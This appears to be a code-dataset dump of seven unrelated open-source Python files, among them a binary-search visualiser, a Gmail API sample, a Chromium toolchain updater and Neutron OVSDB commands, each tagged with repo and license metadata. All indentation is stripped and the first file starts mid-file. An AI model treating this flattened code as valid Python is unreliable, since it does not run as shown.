def run(self, **kwargs):
array = kwargs['container']
data_generator = kwargs['data_generator']
wanted_value = random.randint(1, data_generator.quantity())
array.stats.wanted_value = wanted_value
self.init(array, data_generator.quantity())
self.generate_points(array, data_generator)
for i, value in enumerate(sorted(array)):
array[i] = value
array.sync()
self.search(array, wanted_value)
array.sync()
@staticmethod
def container_class():
return alvi.client.containers.Array
if __name__ == "__main__":
BinarySearch.start() | alviproject/alvi | alvi/client/scenes/binary_search.py | Python | mit | 1,857 |
#!/usr/bin/python
import argparse
import httplib2
from apiclient.discovery import build
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import run_flow, argparser
# Parse the command-line arguments (e.g. --noauth_local_webserver)
parser = argparse.ArgumentParser(parents=[argparser])
flags = parser.parse_args()
# Path to the client_secret.json file downloaded from the Developer Console
#CLIENT_SECRET_FILE = 'h:/.client_secret.json'
CLIENT_SECRET_FILE = '/home/gmv/.client_secret.json'
# Check https://developers.google.com/gmail/api/auth/scopes
# for all available scopes
OAUTH_SCOPE = 'https://www.googleapis.com/auth/gmail.readonly'
# Location of the credentials storage file
STORAGE = Storage('gmail.storage')
# Start the OAuth flow to retrieve credentials
flow = flow_from_clientsecrets(CLIENT_SECRET_FILE, scope=OAUTH_SCOPE)
http = httplib2.Http()
# Try to retrieve credentials from storage or run the flow to generate them
credentials = STORAGE.get()
if credentials is None or credentials.invalid:
credentials = run_flow(flow, STORAGE, flags, http=http)
# Authorize the httplib2.Http object with our credentials
http = credentials.authorize(http)
# Build the Gmail service from discovery
gmail_service = build('gmail', 'v1', http=http)
# Retrieve a page of threads
threads = gmail_service.users().threads().list(userId='me').execute()
# Print ID for each thread
if threads['threads']:
for thread in threads['threads']:
print 'Thread ID: %s' % (thread['id'])
| erdincay/gmvault | src/sandbox/python_api_tests.py | Python | agpl-3.0 | 1,557 |
__all__ = ["config", "pageserver", "restful", "worker"]
import config
import pageserver
import restful
import worker
def run(host, port):
"""
Runs the server.
@param host The host for the server
@param port The port for the server
"""
config.app.run(host=host, port=int(port), debug=True, use_reloader=False)
| wallarelvo/SmallCartography | carto/master/__init__.py | Python | apache-2.0 | 341 |
import fechbase
class Records(fechbase.RecordsBase):
def __init__(self):
fechbase.RecordsBase.__init__(self)
self.fields = [
{'name': 'FORM TYPE', 'number': '1'},
{'name': 'FEC COMMITTEE ID NUMBER (PCC)', 'number': '2'},
{'name': 'COMMITTEE NAME (PCC)', 'number': '3'},
{'name': 'COVERAGE FROM', 'number': '4-'},
{'name': 'COVERAGE TO', 'number': '5-'},
{'name': 'FEC COMMITTEE ID NUMBER (AUTH) (blank for totals record)', 'number': '6'},
{'name': 'COMMITTEE NAME (AUTH)', 'number': '7'},
{'name': 'individuals total', 'number': '8-(a) 11(a)iii'},
{'name': 'Political party committees', 'number': '9-(b) 11(b)'},
{'name': 'other pol committees (PACs)', 'number': '10-(c) 11(c)'},
{'name': 'the candidate', 'number': '11-(d) 11(d)'},
{'name': 'total contributions', 'number': '12-(e) 11(e)'},
{'name': 'Transfers from other auth Committees', 'number': '13-(f) 12'},
{'name': 'made or guarn by candidate', 'number': '14-(g) 13(a)'},
{'name': 'all other loans', 'number': '15-(h) 13(b)'},
{'name': 'total loans', 'number': '16-(i) 13(c)'},
{'name': 'offsets to operating expend', 'number': '17-(j) 14'},
{'name': 'Other receipts', 'number': '18-(k) 15'},
{'name': 'total receipts', 'number': '19-(l) 16'},
{'name': 'Operating Expenditures', 'number': '20-(m) 17'},
{'name': 'Transfers to other auth Committees', 'number': '21-(n) 18'},
{'name': 'made or guaranteed by cand', 'number': '22-(o) 19(a)'},
{'name': 'all other loans', 'number': '23-(p) 19(b)'},
{'name': 'total loan repayments', 'number': '24-(q) 19(c)'},
{'name': 'total refunds individuals', 'number': '25-(r) 20(a)'},
{'name': 'Refunds Political Party Committees', 'number': '26-(s) 20(b)'},
{'name': 'Refunds other Political Committees', 'number': '27-(t) 20(c)'},
{'name': 'total contribution refunds', 'number': '28-(u) 20(d)'},
{'name': 'Other disbursements', 'number': '29-(v) 21'},
{'name': 'Total disbursements', 'number': '30-(w) 22'},
{'name': 'COH BEGINNING REPORTING period', 'number': '31-(x) 23'},
{'name': 'cash on hand at close period', 'number': '32-(y) 27'},
{'name': 'Debts to', 'number': '33-(z) 9'},
{'name': 'Debts by', 'number': '34-(aa) 12'},
{'name': 'net contributions', 'number': '35-(bb) 6(c)'},
{'name': 'net operating expenditures', 'number': '36-(cc) 7(c)'},
]
self.fields_names = self.hash_names(self.fields)
| h4ck3rm1k3/FEC-Field-Documentation | fec/version/v1/F3Z.py | Python | unlicense | 2,766 |
#! /usr/bin/env python
# coding=utf-8
#############################################################################
# #
# File: setup.py #
# #
# Copyright (C) 2008-2010 Du XiaoGang <dugang.2008@gmail.com> #
# #
# Home: http://gappproxy.googlecode.com #
# #
# This file is part of GAppProxy. #
# #
# GAppProxy is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# GAppProxy is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with GAppProxy. If not, see <http://www.gnu.org/licenses/>. #
# #
#############################################################################
from distutils.core import setup
import py2exe
setup(
options = {"py2exe":
{ "optimize": 2,
"compressed": 1,
"bundle_files": 1
}
},
name = "GAppProxy Uploader",
zipfile = None,
console=['uploader.py'],
)
| gauravssnl/gappproxy | uploader/setup.py | Python | gpl-3.0 | 2,173 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import ctypes.wintypes
import hashlib
import json
import os
import subprocess
import sys
BASEDIR = os.path.dirname(os.path.abspath(__file__))
GetFileAttributes = ctypes.windll.kernel32.GetFileAttributesW
GetFileAttributes.argtypes = (ctypes.wintypes.LPWSTR,)
GetFileAttributes.restype = ctypes.wintypes.DWORD
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
def IsHidden(file_path):
"""Returns whether the given |file_path| has the 'system' or 'hidden'
attribute set."""
p = GetFileAttributes(file_path)
assert p != 0xffffffff
return bool(p & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
def GetFileList(root):
"""Gets a normalized list of files under |root|."""
assert not os.path.isabs(root)
assert os.path.normpath(root) == root
file_list = []
for base, _, files in os.walk(root):
paths = [os.path.join(base, f) for f in files]
file_list.extend(x.lower() for x in paths if not IsHidden(x))
return sorted(file_list)
def MakeTimestampsFileName(root):
return os.path.join(root, '..', '.timestamps')
def CalculateHash(root):
"""Calculates the sha1 of the paths to all files in the given |root| and the
contents of those files, and returns as a hex string."""
file_list = GetFileList(root)
# Check whether we previously saved timestamps in $root/../.timestamps. If
# we didn't, or they don't match, then do the full calculation, otherwise
# return the saved value.
timestamps_file = MakeTimestampsFileName(root)
timestamps_data = {'files': [], 'sha1': ''}
if os.path.exists(timestamps_file):
with open(timestamps_file, 'rb') as f:
try:
timestamps_data = json.load(f)
except ValueError:
# json couldn't be loaded, empty data will force a re-hash.
pass
matches = len(file_list) == len(timestamps_data['files'])
if matches:
for disk, cached in zip(file_list, timestamps_data['files']):
if disk != cached[0] or os.stat(disk).st_mtime != cached[1]:
matches = False
break
if matches:
return timestamps_data['sha1']
digest = hashlib.sha1()
for path in file_list:
digest.update(path)
with open(path, 'rb') as f:
digest.update(f.read())
return digest.hexdigest()
def SaveTimestampsAndHash(root, sha1):
"""Save timestamps and the final hash to be able to early-out more quickly
next time."""
file_list = GetFileList(root)
timestamps_data = {
'files': [[f, os.stat(f).st_mtime] for f in file_list],
'sha1': sha1,
}
with open(MakeTimestampsFileName(root), 'wb') as f:
json.dump(timestamps_data, f)
def main():
if sys.platform not in ('win32', 'cygwin'):
return 0
if len(sys.argv) != 1:
print >> sys.stderr, 'Unexpected arguments.'
return 1
# Move to same location as .gclient. This is a no-op when run via gclient.
os.chdir(os.path.normpath(os.path.join(BASEDIR, '..\\..\\..\\..')))
toolchain_dir = 'src\\third_party\\win_toolchain'
target_dir = os.path.join(toolchain_dir, 'files')
sha1path = os.path.join(toolchain_dir, 'toolchain.sha1')
desired_hash = ''
if os.path.isfile(sha1path):
with open(sha1path, 'rb') as f:
desired_hash = f.read().strip()
# If the current hash doesn't match what we want in the file, nuke and pave.
# Typically this script is only run when the .sha1 one file is updated, but
# directly calling "gclient runhooks" will also run it, so we cache
# based on timestamps to make that case fast.
current_hash = CalculateHash(target_dir)
if current_hash != desired_hash:
print 'Windows toolchain out of date or doesn\'t exist, updating...'
if os.path.isdir(target_dir):
subprocess.check_call('rmdir /s/q "%s"' % target_dir, shell=True)
subprocess.check_call([
sys.executable,
'src\\tools\\win\\toolchain\\toolchain2013.py',
'--targetdir', target_dir])
current_hash = CalculateHash(target_dir)
if current_hash != desired_hash:
print >> sys.stderr, (
'Got wrong hash after pulling a new toolchain. '
'Wanted \'%s\', got \'%s\'.' % (
desired_hash, current_hash))
return 1
SaveTimestampsAndHash(target_dir, current_hash)
return 0
if __name__ == '__main__':
sys.exit(main())
| androidarmv6/android_external_chromium_org | tools/win/toolchain/get_toolchain_if_necessary.py | Python | bsd-3-clause | 4,403 |
# Copyright (c) 2015 Openstack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_log import log as logging
from oslo_utils import excutils
from neutron.agent.ovsdb import api
from neutron.agent.ovsdb.native import idlutils
from neutron.i18n import _LE
LOG = logging.getLogger(__name__)
class BaseCommand(api.Command):
def __init__(self, api):
self.api = api
self.result = None
def execute(self, check_error=False, log_errors=True):
try:
with self.api.transaction(check_error, log_errors) as txn:
txn.add(self)
return self.result
except Exception:
with excutils.save_and_reraise_exception() as ctx:
if log_errors:
LOG.exception(_LE("Error executing command"))
if not check_error:
ctx.reraise = False
def __str__(self):
command_info = self.__dict__
return "%s(%s)" % (
self.__class__.__name__,
", ".join("%s=%s" % (k, v) for k, v in command_info.items()
if k not in ['api', 'result']))
class AddBridgeCommand(BaseCommand):
def __init__(self, api, name, may_exist):
super(AddBridgeCommand, self).__init__(api)
self.name = name
self.may_exist = may_exist
def run_idl(self, txn):
if self.may_exist:
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
self.name, None)
if br:
return
row = txn.insert(self.api._tables['Bridge'])
row.name = self.name
self.api._ovs.verify('bridges')
self.api._ovs.bridges = self.api._ovs.bridges + [row]
# Add the internal bridge port
cmd = AddPortCommand(self.api, self.name, self.name, self.may_exist)
cmd.run_idl(txn)
cmd = DbSetCommand(self.api, 'Interface', self.name,
('type', 'internal'))
cmd.run_idl(txn)
class DelBridgeCommand(BaseCommand):
def __init__(self, api, name, if_exists):
super(DelBridgeCommand, self).__init__(api)
self.name = name
self.if_exists = if_exists
def run_idl(self, txn):
try:
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
self.name)
except idlutils.RowNotFound:
if self.if_exists:
return
else:
msg = _LE("Bridge %s does not exist") % self.name
LOG.error(msg)
raise RuntimeError(msg)
self.api._ovs.verify('bridges')
for port in br.ports:
cmd = DelPortCommand(self.api, port.name, self.name,
if_exists=True)
cmd.run_idl(txn)
bridges = self.api._ovs.bridges
bridges.remove(br)
self.api._ovs.bridges = bridges
self.api._tables['Bridge'].rows[br.uuid].delete()
class BridgeExistsCommand(BaseCommand):
def __init__(self, api, name):
super(BridgeExistsCommand, self).__init__(api)
self.name = name
def run_idl(self, txn):
self.result = bool(idlutils.row_by_value(self.api.idl, 'Bridge',
'name', self.name, None))
class ListBridgesCommand(BaseCommand):
def __init__(self, api):
super(ListBridgesCommand, self).__init__(api)
def run_idl(self, txn):
# NOTE (twilson) [x.name for x in rows.values()] if no index
self.result = [x.name for x in
self.api._tables['Bridge'].rows.values()]
class BrGetExternalIdCommand(BaseCommand):
def __init__(self, api, name, field):
super(BrGetExternalIdCommand, self).__init__(api)
self.name = name
self.field = field
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.name)
self.result = br.external_ids[self.field]
class BrSetExternalIdCommand(BaseCommand):
def __init__(self, api, name, field, value):
super(BrSetExternalIdCommand, self).__init__(api)
self.name = name
self.field = field
self.value = value
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.name)
external_ids = getattr(br, 'external_ids', {})
external_ids[self.field] = self.value
br.external_ids = external_ids
class DbSetCommand(BaseCommand):
def __init__(self, api, table, record, *col_values):
super(DbSetCommand, self).__init__(api)
self.table = table
self.record = record
self.col_values = col_values
def run_idl(self, txn):
record = idlutils.row_by_record(self.api.idl, self.table, self.record)
for col, val in self.col_values:
# TODO(twilson) Ugh, the OVS library doesn't like OrderedDict
# We're only using it to make a unit test work, so we should fix
# this soon.
if isinstance(val, collections.OrderedDict):
val = dict(val)
setattr(record, col, val)
class DbClearCommand(BaseCommand):
def __init__(self, api, table, record, column):
super(DbClearCommand, self).__init__(api)
self.table = table
self.record = record
self.column = column
def run_idl(self, txn):
record = idlutils.row_by_record(self.api.idl, self.table, self.record)
# Create an empty value of the column type
value = type(getattr(record, self.column))()
setattr(record, self.column, value)
class DbGetCommand(BaseCommand):
def __init__(self, api, table, record, column):
super(DbGetCommand, self).__init__(api)
self.table = table
self.record = record
self.column = column
def run_idl(self, txn):
record = idlutils.row_by_record(self.api.idl, self.table, self.record)
# TODO(twilson) This feels wrong, but ovs-vsctl returns single results
# on set types without the list. The IDL is returning them as lists,
# even if the set has the maximum number of items set to 1. Might be
# able to inspect the Schema and just do this conversion for that case.
result = idlutils.get_column_value(record, self.column)
if isinstance(result, list) and len(result) == 1:
self.result = result[0]
else:
self.result = result
class SetControllerCommand(BaseCommand):
def __init__(self, api, bridge, targets):
super(SetControllerCommand, self).__init__(api)
self.bridge = bridge
self.targets = targets
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.bridge)
controllers = []
for target in self.targets:
controller = txn.insert(self.api._tables['Controller'])
controller.target = target
controllers.append(controller)
br.verify('controller')
br.controller = controllers
class DelControllerCommand(BaseCommand):
def __init__(self, api, bridge):
super(DelControllerCommand, self).__init__(api)
self.bridge = bridge
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.bridge)
br.controller = []
class GetControllerCommand(BaseCommand):
def __init__(self, api, bridge):
super(GetControllerCommand, self).__init__(api)
self.bridge = bridge
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.bridge)
br.verify('controller')
self.result = [c.target for c in br.controller]
class SetFailModeCommand(BaseCommand):
def __init__(self, api, bridge, mode):
super(SetFailModeCommand, self).__init__(api)
self.bridge = bridge
self.mode = mode
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.bridge)
br.verify('fail_mode')
br.fail_mode = self.mode
class AddPortCommand(BaseCommand):
def __init__(self, api, bridge, port, may_exist):
super(AddPortCommand, self).__init__(api)
self.bridge = bridge
self.port = port
self.may_exist = may_exist
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.bridge)
if self.may_exist:
port = idlutils.row_by_value(self.api.idl, 'Port', 'name',
self.port, None)
if port:
return
port = txn.insert(self.api._tables['Port'])
port.name = self.port
br.verify('ports')
ports = getattr(br, 'ports', [])
ports.append(port)
br.ports = ports
iface = txn.insert(self.api._tables['Interface'])
iface.name = self.port
port.verify('interfaces')
ifaces = getattr(port, 'interfaces', [])
ifaces.append(iface)
port.interfaces = ifaces
class DelPortCommand(BaseCommand):
def __init__(self, api, port, bridge, if_exists):
super(DelPortCommand, self).__init__(api)
self.port = port
self.bridge = bridge
self.if_exists = if_exists
def run_idl(self, txn):
try:
port = idlutils.row_by_value(self.api.idl, 'Port', 'name',
self.port)
except idlutils.RowNotFound:
if self.if_exists:
return
msg = _LE("Port %s does not exist") % self.port
raise RuntimeError(msg)
if self.bridge:
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
self.bridge)
else:
br = next(b for b in self.api._tables['Bridge'].rows.values()
if port in b.ports)
if port.uuid not in br.ports and not self.if_exists:
# TODO(twilson) Make real errors across both implementations
msg = _LE("Port %(port)s does not exist on %(bridge)s!") % {
'port': self.name, 'bridge': self.bridge
}
LOG.error(msg)
raise RuntimeError(msg)
br.verify('ports')
ports = br.ports
ports.remove(port)
br.ports = ports
# Also remove port/interface directly for indexing?
port.verify('interfaces')
for iface in port.interfaces:
self.api._tables['Interface'].rows[iface.uuid].delete()
self.api._tables['Port'].rows[port.uuid].delete()
class ListPortsCommand(BaseCommand):
def __init__(self, api, bridge):
super(ListPortsCommand, self).__init__(api)
self.bridge = bridge
def run_idl(self, txn):
br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.bridge)
self.result = [p.name for p in br.ports if p.name != self.bridge]
class PortToBridgeCommand(BaseCommand):
def __init__(self, api, name):
super(PortToBridgeCommand, self).__init__(api)
self.name = name
def run_idl(self, txn):
# TODO(twilson) This is expensive!
# This traversal of all ports could be eliminated by caching the bridge
# name on the Port's (or Interface's for iface_to_br) external_id field
# In fact, if we did that, the only place that uses to_br functions
# could just add the external_id field to the conditions passed to find
port = idlutils.row_by_value(self.api.idl, 'Port', 'name', self.name)
bridges = self.api._tables['Bridge'].rows.values()
self.result = next(br.name for br in bridges if port in br.ports)
class DbListCommand(BaseCommand):
def __init__(self, api, table, records, columns, if_exists):
super(DbListCommand, self).__init__(api)
self.requested_info = {'records': records, 'columns': columns,
'table': table}
self.table = self.api._tables[table]
self.columns = columns or self.table.columns.keys() + ['_uuid']
self.if_exists = if_exists
if records:
self.records = []
for record in records:
try:
self.records.append(idlutils.row_by_record(
self.api.idl, table, record).uuid)
except idlutils.RowNotFound:
if self.if_exists:
continue
raise
else:
self.records = self.table.rows.keys()
def run_idl(self, txn):
try:
self.result = [
{
c: idlutils.get_column_value(self.table.rows[uuid], c)
for c in self.columns
if not self.if_exists or uuid in self.table.rows
}
for uuid in self.records
]
except KeyError:
# NOTE(kevinbenton): this is converted to a RuntimeError for compat
# with the vsctl version. It might make more sense to change this
# to a RowNotFoundError in the future.
raise RuntimeError(_LE(
"Row removed from DB during listing. Request info: "
"Table=%(table)s. Columns=%(columns)s. "
"Records=%(records)s.") % self.requested_info)
class DbFindCommand(BaseCommand):
def __init__(self, api, table, *conditions, **kwargs):
super(DbFindCommand, self).__init__(api)
self.table = self.api._tables[table]
self.conditions = conditions
self.columns = (kwargs.get('columns') or
self.table.columns.keys() + ['_uuid'])
def run_idl(self, txn):
self.result = [
{
c: idlutils.get_column_value(r, c)
for c in self.columns
}
for r in self.table.rows.values()
if idlutils.row_match(r, self.conditions)
]
| mandeepdhami/neutron | neutron/agent/ovsdb/native/commands.py | Python | apache-2.0 | 14,603 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.